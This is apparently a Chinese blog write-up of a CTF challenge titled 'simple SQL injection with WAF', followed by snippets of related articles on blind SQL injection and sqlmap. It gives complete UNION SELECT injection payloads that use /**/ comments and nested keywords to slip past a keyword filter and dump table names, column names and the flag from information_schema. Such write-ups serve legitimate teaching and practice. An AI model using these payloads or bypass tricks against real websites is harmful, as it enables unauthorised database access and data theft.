2018 11 14 簡單的SQL注入(帶waf)

2021-09-29 13:55:17 字數 790 閱讀 7713

題目:簡單的sql注入 分值:10

url:

解題思路:

輸入1,顯示了正常id,輸入1',報錯mysql,明顯的sql注入點。

直接嘗試sqlmap,沒有結果(或許應該嘗試–tamper 引數,使用指令碼過waf,或者抓個包試一下)。

輸入1' and '1'='1 ,頁面沒有反應。手工輸入1' and '1'='2,頁面沒有反應。說明存在某種waf。

簡單的嘗試後發現waf遮蔽了mysql關鍵字和關鍵字+空格的組合(例如:select+ 、union+ )

解題步驟:

已知資料庫型別為mysql,直接使用預設庫爆表名,輸入:

1'union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/'1'='1

發現flag表,爆丫列名,列名這裡做了一些遮蔽,使用巢狀方式繞過,輸入:

1'union/**/select/**/column_namcolumn_namee/**/from/**/information_scheminformation_schema.columnsa.columns/**/where/**/table_name='flag

爆出flag表的列名,查詢flag列,輸入:

1'union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

拿到flag(flag),10分到手。

sql盲注特點 SQL盲注

盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...

實驗吧 簡單的注sql入 writeup

1.輸入id值,通過回顯發現題目應該是進行了空格過濾 2.使用sqlmap進行注入 2.1 python sqlmap.py u random agent tamper space2comment.py current db 檢視當前資料庫名稱,返回web1 current db tables 檢視...

SQL盲注 時間盲注,dnslog盲注

時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...